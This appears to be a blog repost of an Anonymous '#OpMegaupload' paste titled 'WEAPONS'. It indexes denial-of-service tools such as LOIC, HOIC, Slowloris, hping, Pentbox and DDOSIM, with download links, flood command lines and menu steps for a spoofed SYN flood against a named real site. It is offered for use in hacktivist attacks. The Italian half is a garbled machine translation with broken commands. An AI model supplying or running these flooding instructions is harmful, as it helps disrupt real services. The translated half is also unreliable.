Lista software Anonymous

                  Anonymous Software                

                       Lista in Inglese
1.
#Anonymous #OpMegaupload #Setup #Tutorials
2.

 3.
                                                    | W E A P O N S |
 4.
                                                          v.0.1
 5.
                                                         
6.
                                              n00b tutorial & toolz index
 7.

 8.

 9.

 10.
                windows
 11.
---------------------------------------------------------------------------------------------------------
 12.

 13.
LOIC
14.
Download:
 15.
https://github.com/NewEraCracker/LOIC/downloads
 16.
Usage:
 17.

 18.
HOIC
19.
Download:
 20.
http://hoic.99k.org
 21.

 22.
Pentbox
 23.
http://www.pentbox.net/download-pentbox/
 24.

 25.

 26.
Slowloris
27.
http://www.multiupload.nl/8KT494DULW
 28.

 29.
Usage:
 30.
http://pastebin.com/5deha9Ug
 31.

 32.

 33.
r-u-dead-yet?
 34.
http://www.hybridsec.com/tools/rudy/
 35.

 36.

 37.
hping2
 38.
Download:
 39.
http://www.hping.org/
 40.
hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
 41.
4 moar options take a look @ http://pastebin.com/uM1MjN4b
 42.

 43.

 44.

 45.
for advanced users:
 46.
http://www.thc.org/thc-ssl-dos/
 47.

 48.

 49.

 50.
                linux
 51.
---------------------------------------------------------------------------------------------------------
 52.

 53.
Pentbox includes :
 54.
TCP Flood DoSer
 55.
TCP Flood AutoDoSer
 56.
Spoofed SYN Flood DoSer [nmap - hping3] <-- best 4 our actions!
 57.
Port scanner
 58.
Honeypot
 59.
PenTBox Secure Instant Messaging
 60.
No Hivemode mode included, must fire manually.
 61.

 62.
Download:
 63.
http://www.pentbox.net/download-pentbox/  <---
 64.
use it as standalone or better with hping3 (see above)
 65.

 66.
startin terminal:
 67.
sudo su
68.
cd pentbox 
 69.
ruby pentbox.rb
70.

 71.
then type:
 72.
2
 73.
1
 74.
2
 75.
input target example: leader.ir
 76.
input target port : 80
 77.
as default u use random sources but for beeing more effective use it with ur own packages.
 78.

 79.

 80.
hping3
 81.
Download:
 82.
http://www.hping.org/hping3-20051105.tar.gz
 83.

 84.
Usage:
 85.
hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
 86.
4 moar options take a look @ http://pastebin.com/uM1MjN4b
 87.

 88.

 89.
slowloris
 90.
http://ha.ckers.org/slowloris/
 91.

 92.
Download & Install:
 93.
http://ha.ckers.org/slowloris/slowloris.pl
 94.

 95.
perl -MCPAN -e 'install IO::Socket::INET'
 96.
perl -MCPAN -e 'install IO::Socket::SSL' | http://search.cpan.org/CPAN/authors/id/B/BE/BEHROOZI/IO-Socket-SSL-0.97.tar.gz
 97.
perl -MCPAN -e ’install GetOpt::Long' | http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz
 98.

 99.
Usage:
 100.
sudo su
 101.
perl slowloris.pl
102.

 103.
examples:
 104.
http ddos  ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
105.
https ddos ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
106.
4 moar options take a look @ http://pastebin.com/uM1MjN4b
 107.

 108.

 109.
loiq
 110.
http://sourceforge.net/projects/loiq/files/
 111.

 112.

 113.
pyloris
 114.
...can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.
 115.

 116.
Download:
 117.
http://sourceforge.net/projects/pyloris/files/pyloris/3.2/pyloris-3.2.tgz/download
 118.

 119.

 120.
pyloic (python loic)
 121.

 122.
Download:
 123.
https://github.com/kenkeiras/pyLOIC/downloads
 124.

 125.
Usage:
 126.

 127.

 128.
r-u-dead-yet?
 129.
Download:
 130.
http://www.hybridsec.com/tools/rudy/
 131.

 132.

 133.
DDOSIM
 134.
Info:
 135.
http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/
 136.
Download:
 137.
http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download
 138.

 139.
Usage:
 140.
./ddosim
 141.
-d IP                   Target IP address
 142.
-p PORT            Target port
 143.
[-k NET]             Source IP from class C network (ex. 10.4.4.0)
 144.
[-i IFNAME]      Output interface name
 145.
[-c COUNT]       Number of connections to establish
 146.
[-w DELAY]       Delay (in milliseconds) between SYN packets
 147.
[-r TYPE]             Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
 148.
[-t NRTHREADS]   Number of threads to use when sending packets (default 1)
 149.
[-n]                       Do not spoof source address (use local address)
 150.
[-v]                       Verbose mode (slower)
 151.
[-h]                       Print this help message
 152.
Examples:
 153.
1. Establish 10 TCP connections from random IP addresses to www  server and send invalid HTTP requests (similar to a DC++ based attack):
 154.
./ddosim   -d 192.168.1.2   -p 80   -c 10   -r HTTP_INVALID  -i eth0
 155.
2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:
 156.
./ddosim   -d 192.168.1.2   -p 25   -k 10.4.4.0   -c 0   -r SMTP_EHLO  -i eth0
 157.
3. Establish infinite connections at higher speed to www server and make HTTP valid requests:
 158.
./ddosim   -d 192.168.1.2   -p 80   -c 0   -w 0   -t 10   -r HTTP_VALID  -i eth0
 159.
4. Establish infinite TCP connections (without sending a Layer 7 request)  from local address to a POP3 server:
 160.
./ddosim   -d 192.168.1.2   -p 110   -c 0  -i eth0
 161.

 162.

 163.

 164.
for advanced users:
 165.
http://www.thc.org/thc-ssl-dos/
 166.

 167.

 168.

 169.
                MAC
 170.
---------------------------------------------------------------------------------------------------------
 171.
ZAP
 172.
http://www.cowfight.com/cf4/zapattack/
 173.
http://www.cowfight.com/cf4/zapattack/
 174.

 175.

 176.
Pentbox
 177.
http://www.pentbox.net/download-pentbox/
 178.

 179.

 180.
HowTo use LOIC (or others) on a MAC using MONO:
 181.
https://github.com/NewEraCracker/LOIC/wiki/How-to-run-LOIC-using-Mono
 182.

 183.

 184.

 185.

 186.
                Operation Systems
 187.
---------------------------------------------------------------------------------------------------------
 188.
http://insurgen.cc/index.php?title=L/i/nux
 189.
http://insurgen.cc/index.php?title=W/i/ndows
 190.

 191.

 192.
AnonOS
 193.
http://operationcelebration.net/wiki/AnonOS
 194.

 195.

 196.
Annonaceae v.0.0.3 MELCHISEDEK (PROJECT BASIS.) http://www.filefactory.com/file/b513ah8/n/annonaceae.iso
 197.

 198.

 199.
AnonOS (Strictly Defensive)
 200.
Rebulding is planned! v0.1 (initial!) http://piratenpad.de/AnonOS-v0-1 Documentation: http://piratepad.net/3540VLXFg7
 201.

 202.

 203.
Cherimoya Internet Security LiveCD (for raids)
 204.
v.0.0.1 MELCHISEDEK (Merged from another project) http://ge.tt/3nrRkBf   Documentation: http://piratepad.net/3540VLXFg7
 205.

 206.

 207.
TAILS
 208.
https://amnesia.boum.org/
 209.
Download:
 210.
http://dl.amnesia.boum.org/tails/stable/
 211.

 212.

 213.
AnonymOS
 214.
http://sourceforge.net/projects/anonym-os/files/Anonym.OS%20Live%20CD/ShmooCon%202006/anonymos-shmoo.iso/download
 215.

 216.

 217.
Liberte Linux - persistent,portable USB OS 4 anon communikation
 218.
http://dee.su/liberte
 219.

 220.
Download:
 221.
http://sourceforge.net/projects/liberte/files/2010.1/liberte-2010.1.zip/download
 222.

 223.

 224.
Privatix - persistent,portable USB OS 4 privacy & encryption
 225.
http://download.kommunikationssystem.de/privatix_10.02.07_de.iso
 226.

 227.

 228.
to make linux distros portable use http://unetbootin.sourceforge.net/

create a new version of this paste RAW Paste Data
                                                   Lista in Italiano
1.Anonimo # # # Setup # OpMegaupload Tutorials
2.


3.
| W E A P O N S |

4.
v.0.1

5.

6.
n00b esercitazione & Toolz index

7.


8.


9.


10.
finestre

11.


12.


13.LOIC
14.Download:

15.https://github.com/NewEraCracker/LOIC/downloads

16.Uso:

17.


18.HOIC
19.Download:

20.http://hoic.99k.org

21.


22.Pentbox

23.http://www.pentbox.net/download-pentbox/~~V

24.


25.


26.Slowloris
27.http://www.multiupload.nl/8KT494DULW

28.


29.Uso:

30.http://pastebin.com/5deha9Ug~~V

31.


32.


33.r-u-morta-ancora?

34.http://www.hybridsec.com/tools/rudy/~~V

35.


36.


37.Hping2

38.Download:

39.http://www.hping.org/~~V

40.hping [2 o 3] [TARGET]-p [PORT] - flood [tipo di pacchetto] [ALTRE OPZIONI]

41.4 opzioni Moar dare un'occhiata @ http://pastebin.com/uM1MjN4b

42.


43.


44.


45.per gli utenti avanzati:

46.http://www.thc.org/thc-ssl-dos/

47.


48.


49.


50.
linux

51.


52.


53.Pentbox comprende:

54.TCP Flood Doser

55.TCP Flood AutoDoSer

56.Falsificato SYN Flood Doser [nmap - hping3] <- 4 migliori le nostre azioni!

57.Port scanner

58.Honeypot

59.PenTBox sicura Instant Messaging

60.Nessuna modalità Hivemode incluso, deve sparare manualmente.

61.


62.Download:

63.http://www.pentbox.net/download-pentbox/ <---

64.usarlo come autonomo o meglio con hping3 (vedi sopra)

65.


66.Startin terminale:

67.sudo su
68.cd pentbox

69.ruby pentbox.rb
70.


71.quindi digitare:

72.2

73.1

74.2

75.Esempio di input target: leader.ir

76.Ingresso porta di destinazione: 80

77.u come predefinita utilizzare fonti casuali, ma per beeing più efficace utilizzare con ur propri pacchetti.

78.


79.


80.hping3

81.Download:

82.http://www.hping.org/hping3-20051105.tar.gz

83.


84.Uso:

85.hping [2 o 3] [TARGET]-p [PORT] - flood [tipo di pacchetto] [ALTRE OPZIONI]

86.4 opzioni Moar dare un'occhiata @ http://pastebin.com/uM1MjN4b

87.


88.


89.slowloris

90.http://ha.ckers.org/slowloris/

91.


92.Download e installazione:

93.http://ha.ckers.org/slowloris/slowloris.pl

94.


95.MCPAN-perl-e 'install IO :: Socket :: INET'

96.MCPAN-perl-e 'install IO :: Socket :: SSL' | http://search.cpan.org/CPAN/authors/id/B/BE/BEHROOZI/IO-Socket-SSL-0.97.tar.gz

97.MCPAN-perl-e 'install Getopt :: Long' | http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz

98.


99.Uso:

100.sudo su

101.perl slowloris.pl
102.


103.esempi:

104.http DDoS. / slowloris.pl-dns www.example.com-port 80-timeout 2000-500-tcpto numero 5
105.https DDoS. / slowloris.pl-dns www.example.com-port 443-timeout 30-num 500-https
106.4 opzioni Moar dare un'occhiata @ http://pastebin.com/uM1MjN4b

107.


108.


109.loiq

110.http://sourceforge.net/projects/loiq/files/

111.


112.


113.pyloris

114.... Possono utilizzare i proxy SOCKS e le connessioni SSL, e può avere come bersaglio protocolli come HTTP, FTP, SMTP, IMAP e Telnet.

115.


116.Download:

117.http://sourceforge.net/projects/pyloris/files/pyloris/3.2/pyloris-3.2.tgz/download

118.


119.


120.pyloic (python loic)

121.


122.Download:

123.https://github.com/kenkeiras/pyLOIC/downloads

124.


125.Uso:

126.


127.


128.r-u-morta-ancora?

129.Download:

130.http://www.hybridsec.com/tools/rudy/~~V

131.


132.


133.DDOSIM

134.Info:

135.http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/

136.Download:

137.http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz/download

138.


139.Uso:

140.. / Ddosim

141.-D indirizzo IP di destinazione IP

142.-P PORT porto di destinazione

143.[K-NET] Source IP da rete di classe C (es. 10.4.4.0)

144.[-I IFNAME] Uscita nome di interfaccia

145.[C-COUNT] Numero di connessioni per stabilire

146.[W-DELAY] Delay (in millisecondi) tra i pacchetti SYN

147.[R-TYPE] Richiesta di inviare dopo TCP 3-way handshake. TYPE può essere HTTP_VALID o HTTP_INVALID o SMTP_EHLO

148.[-T NRTHREADS] numero di thread da utilizzare per l'invio di pacchetti di default (1)

149.[-N] Non indirizzo sorgente spoof (utilizzare l'indirizzo locale)

150.[-V] Verbose mode (più lento)

151.[-H] Stampa questo messaggio di aiuto

152.Esempi:

153.1. Stabilire 10 connessioni TCP da indirizzi IP casuali al server www e inviare richieste HTTP non validi (simile ad un attacco DC + + based):

154.. / Ddosim-d 192.168.1.2-p 80-C 10-R HTTP_INVALID-i eth0

155.2. Stabilire connessioni infinite dalla rete di origine 10.4.4.0 al server SMTP e inviare richieste di EHLO:

156.. / Ddosim-d 192.168.1.2-p 25-k 10.4.4.0-c 0-r-i eth0 SMTP_EHLO

157.3. Stabilire connessioni infinite a una velocità superiore al server www e fare richieste HTTP valide:

158.. / Ddosim-d 192.168.1.2-p 80-c 0-w 0-t 10-r-i eth0 HTTP_VALID

159.4. Stabilire infinite connessioni TCP (senza l'invio di una richiesta di 7 Layer) da indirizzo locale a un server POP3:

160.. / Ddosim-d 192.168.1.2-p 110-c 0-i eth0

161.


162.


163.


164.per gli utenti avanzati:

165.http://www.thc.org/thc-ssl-dos/

166.


167.


168.


169.
MAC

170.


171.ZAP

172.http://www.cowfight.com/cf4/zapattack/~~V

173.http://www.cowfight.com/cf4/zapattack/~~V

174.


175.


176.Pentbox

177.http://www.pentbox.net/download-pentbox/~~V

178.


179.


180.HowTo uso LOIC (o altri) su un Mac utilizzando MONO:

181.https://github.com/NewEraCracker/LOIC/wiki/How-to-run-LOIC-using-Mono

182.


183.


184.


185.


186.
Sistemi operativi

187.


188.http://insurgen.cc/index.php?title=L/i/nux

189.http://insurgen.cc/index.php?title=W/i/ndows

190.


191.


192.AnonOS

193.http://operationcelebration.net/wiki/AnonOS

194.


195.


196.Annonaceae v.0.0.3 Melchisedek (base del progetto.) Http://www.filefactory.com/file/b513ah8/n/annonaceae.iso

197.


198.


199.AnonOS (strettamente difensiva)

200.Rebulding è prevista! v0.1 (initial!) http://piratenpad.de/AnonOS-v0-1 Documentazione: http://piratepad.net/3540VLXFg7

201.


202.


203.Cherimoya Internet Security LiveCD (per il raid)

204.v.0.0.1 Melchisedek (uniti da un altro progetto) http://ge.tt/3nrRkBf Documentazione: http://piratepad.net/3540VLXFg7

205.


206.


207.CODE

208.https://amnesia.boum.org/~~V

209.Download:

210.http://dl.amnesia.boum.org/tails/stable/

211.


212.


213.AnonymOS

214.


215.


216.


217.Liberte Linux - persistente, USB portatile OS 4 communikation anon

218.http://dee.su/liberte~~V

219.


220.Download:

221.http://sourceforge.net/projects/liberte/files/2010.1/liberte-2010.1.zip/download

222.


223.


224.Privatix - persistente, USB portatile OS 4 privacy e crittografia

225.http://download.kommunikationssystem.de/privatix_10.02.07_de.iso

226.


227.


228.per rendere linux distro http://unetbootin.sourceforge.net/ portatile uso

creare una nuova versione di questi dati pasta pasta cruda


La lista non e stata creata da Hacker's for italy. i numeri che vedete in più ci sono perchè erano anche nella lista originale, allora non ho voluto modificarla. Non mi assumo nessuna responsabilità dei software contenenti all'interno. La traduzione e stata effettuata con Google traduttore, quindi puo risultare imperfetta.

Nessun commento:

Posta un commento